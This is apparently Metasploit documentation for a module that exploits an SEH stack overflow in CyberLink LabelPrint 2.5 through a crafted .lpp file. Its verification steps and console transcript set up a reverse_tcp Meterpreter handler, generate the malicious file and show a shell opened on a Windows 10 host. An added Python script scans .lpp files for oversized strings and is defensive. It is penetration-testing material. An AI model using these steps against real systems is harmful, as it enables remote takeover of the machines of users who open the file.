metasploit-gs/documentation/modules/exploit/windows/fileformat/cyberlink_lpp_bof.md

Description

This module exploits a stack buffer overflow in CyberLink LabelPrint 2.5 and below. The vulnerability is triggered when a .lpp project file containing an overly long string is opened via the open file menu. The overflow overwrites a structured exception handler (SEH) record, which allows the attacker to take over the application. This module has been tested on Windows 7 (64 bit), Windows 8.1 (64 bit), and Windows 10 (64 bit).
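
A defensive triage check for the condition described above, added here as an example and not part of the module or its documentation: it flags .lpp files that contain an unusually long quoted string before they are opened. It assumes the project file stores its strings as double-quoted text values; the 512-character threshold, the function names and the sample element names are hypothetical.

```python
import re
from pathlib import Path

# Assumption: triage threshold chosen for illustration, not taken from the page.
MAX_VALUE_LEN = 512
# Assumption: strings in the project file appear as double-quoted values.
QUOTED = re.compile(rb'"([^"\r\n]*)"')


def normalize(data: bytes) -> bytes:
    """Re-encode BOM-marked UTF-16 as UTF-8 so one byte regex covers both."""
    if data[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return data.decode("utf-16", errors="replace").encode("utf-8", errors="replace")
    return data


def oversized_values(data: bytes, limit: int = MAX_VALUE_LEN):
    """Return (offset, length) of each quoted value longer than `limit`.

    Offsets refer to the normalized text, not the raw file bytes.
    """
    text = normalize(data)
    return [(m.start(1), len(m.group(1)))
            for m in QUOTED.finditer(text) if len(m.group(1)) > limit]


def scan_tree(root: str, limit: int = MAX_VALUE_LEN):
    """Map every .lpp file under `root` that has oversized values to its hits."""
    findings = {}
    for path in Path(root).rglob("*.lpp"):
        hits = oversized_values(path.read_bytes(), limit)
        if hits:
            findings[str(path)] = hits
    return findings


# Constructed samples; element and attribute names are hypothetical, not the real schema.
BENIGN = b'<PROJECT><ITEM label="Holiday mix 2018" /></PROJECT>'
SUSPECT = b'<PROJECT><ITEM label="' + b"A" * 4000 + b'" /></PROJECT>'

if __name__ == "__main__":
    print("benign :", oversized_values(BENIGN))
    print("suspect:", oversized_values(SUSPECT))
```

A hit is a reason to quarantine the file and inspect it, not proof of an exploit; tune the threshold against known-good project files.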

Vulnerable Application

CyberLink LabelPrint v2.5, which is available with Power2Go 12 Essential.

Verification Steps

  1. ./msfconsole
  2. use exploit/multi/handler
  3. set payload windows/meterpreter/reverse_tcp
  4. set lhost <lhost>
  5. set exitonsession false
  6. exploit -j
  7. use windows/fileformat/cyberlink_lpp_bof
  8. set lhost <lhost>
  9. set target 2
  10. exploit
  11. Copy file to Win10 host and open in vulnerable software
  12. Get a shell

Scenarios

msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 172.22.222.132 
lhost => 172.22.222.132
msf exploit(multi/handler) > set exitonsession false
exitonsession => false
msf exploit(multi/handler) > exploit -j
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf exploit(multi/handler) >
[*] Started reverse TCP handler on 172.22.222.132:4444
use windows/fileformat/cyberlink_lpp_bof
msf exploit(windows/fileformat/cyberlink_lpp_bof) > set lhost 172.22.222.132 
lhost => 172.22.222.132
msf exploit(windows/fileformat/cyberlink_lpp_bof) > set target 2
target => 2
msf exploit(windows/fileformat/cyberlink_lpp_bof) > exploit

[*] Creating 'msf.lpp' file ...
[+] msf.lpp stored at /home/msfdev/.msf4/local/msf.lpp
msf exploit(windows/fileformat/cyberlink_lpp_bof) >
[*] Sending stage (179779 bytes) to 172.22.222.200
[*] Meterpreter session 1 opened (172.22.222.132:4444 -> 172.22.222.200:50522) at 2018-12-11 06:24:38 -0600
sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : DESKTOP-IPOGIJR
OS              : Windows 10 (Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.22.222.200 - Meterpreter session 1 closed.  Reason: User exit